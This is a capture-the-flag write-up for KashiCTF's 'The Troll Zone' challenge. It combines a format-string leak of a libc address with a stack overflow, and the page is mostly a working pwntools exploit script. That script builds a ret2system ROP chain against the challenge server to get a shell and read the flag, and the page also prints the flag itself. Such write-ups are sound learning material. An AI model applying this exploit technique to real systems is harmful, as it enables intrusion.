The Troll Zone

Upsolve

ROP ROP all the way

Below is some interaction with the binary.

On decompiling the binary, notice that there is a format string vulnerability in the troll function() and stack buffer overflow vulnerability in the main() function.

The only thing we need now is an infoleak of libc, as, there is no interesting ROP gadget in the binary itself. It seems that we can use the format string vulnerablility to leak something? When I'm looking at the stack state when the format string vulnerable printf is called, I found an address that seems to be related to / located in the libc executable area. Fortunately, this address can be leaked by the format string vulnerability. Now, we have everything needed to invoke ret2system.

from pwn import *

local = 0
libc_elf = ELF('./libc.so.6')
gdbsc = """
c
"""
if local:
    ld_path = "./ld-linux-x86-64.so.2"
    p = process([ld_path, "--library-path", ".", "./vuln"])
    gdb.attach(p, gdbscript=gdbsc)
else:
    p = remote('kashictf.iitbhucybersec.in', 41957)

payload = f"%37$lx".encode()
p.sendline(payload)
bs = p.recvline()
log.info(bs)
pattern = b"(7f.*)\n"

match = re.search(pattern, bs)[0][:-1]
match = int(match, 16)
log.warning(f"{bs} | stack : {hex(match)}")

libc_leak = match-0x1E25-0x4e0+0x1000
system_pos = libc_leak + 0x26490
binsh_pos = libc_leak + 0x170031
libc_base = system_pos - libc_elf.symbols['system']

log.info(f"{hex(system_pos)} {hex(binsh_pos)} {hex(libc_leak)}")

payload = b''
payload += b'A'*(0x20+0x8)
payload += p64(libc_base+0x0000000000026e99) # ret
payload += p64(libc_base+0x00000000000277e5) # pop rdi ; ret
payload += p64(binsh_pos)
payload += p64(system_pos)

p.sendline(payload)

p.sendline(b'cat flag.txt')

p.interactive()

FLAG: KashiCTF{did_some_trolling_right_there_lzAXxn0b}

Previousleap_of_faith NextWeb

Last updated 1 year ago